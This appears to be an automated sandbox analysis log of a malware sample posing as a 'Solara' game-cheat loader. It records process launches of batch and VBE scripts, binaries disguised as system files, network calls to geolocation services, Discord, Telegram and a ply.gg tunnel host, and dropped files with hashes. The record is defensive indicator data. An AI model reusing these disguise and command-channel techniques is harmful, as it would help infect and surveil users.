C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\hostNet\RuntimeBroker.exe

"C:\hostNet\RuntimeBroker.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
NL 23.62.61.146:443 www.bing.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 146.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.130.233:443 discordapp.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 73.143.109.104.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/2692-0-0x00007FFBF81B3000-0x00007FFBF81B5000-memory.dmp

memory/2692-1-0x00000000001F0000-0x00000000003D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Loader.exe

MD5 8f77f8b13b914f358059e3f7b9ddab70
SHA1 d406a28486b4dd881c454e526e149b98c0ec8462
SHA256 c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512 b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

memory/2692-11-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sol.exe

MD5 25daefc71be60b76cb49fc81424d768d
SHA1 48be475dd36b433d62d4f7fed9b4d81a90122dee
SHA256 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512 e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

memory/3584-19-0x0000000000FB0000-0x0000000000FDA000-memory.dmp

memory/3584-21-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara_Updater.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/2692-26-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

C:\hostNet\rlqSVEj.vbe

MD5 92408a105526970fa12ef23225de61ae
SHA1 bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256 b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
SHA512 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 28ff989c1d462f567aabb9c5ba76456b
SHA1 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256 a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA512 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

MD5 ff8f5c2670894f74456e534b34d6a8fe
SHA1 e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256 d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512 a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

memory/1844-54-0x0000000000330000-0x0000000000346000-memory.dmp

memory/3256-60-0x0000028C40D40000-0x0000028C40D80000-memory.dmp

memory/3584-59-0x00007FFBF81B0000-0x00007FFBF8C71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log

MD5 bb6a89a9355baba2918bb7c32eca1c94
SHA1 976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2
SHA256 192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b
SHA512 efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f54vhkuk.5ro.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1596-90-0x00000283EF1F0000-0x00000283EF212000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/3256-107-0x0000028C5B4D0000-0x0000028C5B546000-memory.dmp

memory/3256-108-0x0000028C5B450000-0x0000028C5B4A0000-memory.dmp

memory/3256-109-0x0000028C429C0000-0x0000028C429DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 966914e2e771de7a4a57a95b6ecfa8a9
SHA1 7a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA256 98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512 dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d3235ed022a42ec4338123ab87144afa
SHA1 5058608bc0deb720a585a2304a8f7cf63a50a315
SHA256 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

memory/3256-145-0x0000028C429F0000-0x0000028C429FA000-memory.dmp

memory/3256-146-0x0000028C5B550000-0x0000028C5B562000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 063fa26d779f114734bd9130125608c3
SHA1 3a1b8fb1a319f6c40a71b117d6b07106d2a53857
SHA256 e8f8cb3e295999c4b311836d5fe1213b4721d56ab14af3eacd1bcdd051b5a66b
SHA512 fbe868cad1196fa3630581f269e8c512af1ed7b1d1e5708c369ed28810d37e48301370f19260657f47a560165113d28437741db39b91aaff69776143598b4391

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 852f019aa3823e1c90335ba698f31412
SHA1 a94ebb8e47316a5fec092ab897ec34299a82d200
SHA256 b4bed2ce3d5b6577836eb2b0a766c008243a1db942e341717fb4bc18e84fc2f0
SHA512 ca94865644cb570f60cf35a08ad5de6a3af4503bc40845237219c31e910f89cc93b280d997514583d86e6cf45eb2b8749bfe2e41bbaef67471e0b64b579e5ab3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1f8ac7ecec0193d6e152c3f10d070340
SHA1 945a8957d0c35c873bf16bf83b48928d4e09b82b
SHA256 f21d3bc031be1db415de1a6324660e5540bb7d8f4bdc75f22ba8ebb95643d044
SHA512 d3a469acc6f53976f8a61cb97da755e47aec35aee8f8c8bc12c9b95435567cb83dee0739662ef303e4a58d57f05c212f685a556d07e5bf7a13f794e800e8a7f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 993af531f0b57e8128ec273731c3a8e2
SHA1 a42ea55876f4f390837dd2c95fb7ff2344b6e9e1
SHA256 fff934d70d813381536d272c5b8ac6ad70acd054267b13592da767c9bd1dda62
SHA512 bdf5970ff2ee314dc297fce5c0f44765e77acbf269cd9ad9e7448a391d5f80d66a0c5426f99bc3480851e8763413aa180b3b3b6b22ef0e86a365450cb8c334e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RustCheat.exe.log

MD5 4c8fa14eeeeda6fe76a08d14e08bf756
SHA1 30003b6798090ec74eb477bbed88e086f8552976
SHA256 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5
SHA512 116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a7cc007980e419d553568a106210549a
SHA1 c03099706b75071f36c3962fcc60a22f197711e0
SHA256 a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165
SHA512 b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60945d1a2e48da37d4ce8d9c56b6845a
SHA1 83e80a6acbeb44b68b0da00b139471f428a9d6c1
SHA256 314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3
SHA512 5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

C:\Windows\System32\drivers\etc\hosts

MD5 4028457913f9d08b06137643fe3e01bc
SHA1 a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512 c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39c2ac09b52b0685c7da5b25746d8a64
SHA1 c0ac1559da69dc9ad0496c11ce37ef9b907ea656
SHA256 c582429e23c81918907db9c7f32bef2d32c873f2da84fa450707482408e3a160
SHA512 9a6f4c5944cecdd6cf2114f7db583e4742a93b3c9eec6fd60328585370a8ba2f917f7ce689c0341d2dbf391f58ff34ee0088d9d2158ebb2450c547257da095a1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88be3bc8a7f90e3953298c0fdbec4d72
SHA1 f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256 533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA512 4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6317adf4fbc43ea2fd68861fafd57155
SHA1 6b87c718893c83c6eed2767e8d9cbc6443e31913
SHA256 c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af
SHA512 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

memory/1680-378-0x0000000000A50000-0x0000000000C2E000-memory.dmp

memory/1680-387-0x0000000002E10000-0x0000000002E1E000-memory.dmp

memory/1680-389-0x000000001B750000-0x000000001B76C000-memory.dmp

memory/1680-391-0x000000001B770000-0x000000001B788000-memory.dmp

memory/1680-393-0x000000001B730000-0x000000001B738000-memory.dmp

memory/1680-395-0x000000001B740000-0x000000001B74C000-memory.dmp

C:\Users\Public\fontdrvhost.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/1680-440-0x000000001B820000-0x000000001B8ED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PJqEZBSiLBjdEMy

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\FiKQLIAECimLXAT

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\bPWqZHLGBcZpXUf

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Temp\bPWqZHLGBcZpXUf

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Temp\RGvSTjGGR5lxMym\Display\Display.png

MD5 c10c4e77aa43ee0f43c917dfb00f3189
SHA1 f0f398a2bb09c628cb381e3718cc7769dd2b3dcb
SHA256 49edc426350a6f59a1837380cd284c2dd51c92d37a8e19a8134a70a74742b03b
SHA512 27119f3d89ab36e497e49d4049d77c57f9e05019c8414b0bcea035f3e10eb2348bcbbe6b3ee7cd60f1b430dd155aa93bde40ceec77f8456a57c511111c346f95

memory/1284-795-0x00000000005F0000-0x00000000005F8000-memory.dmp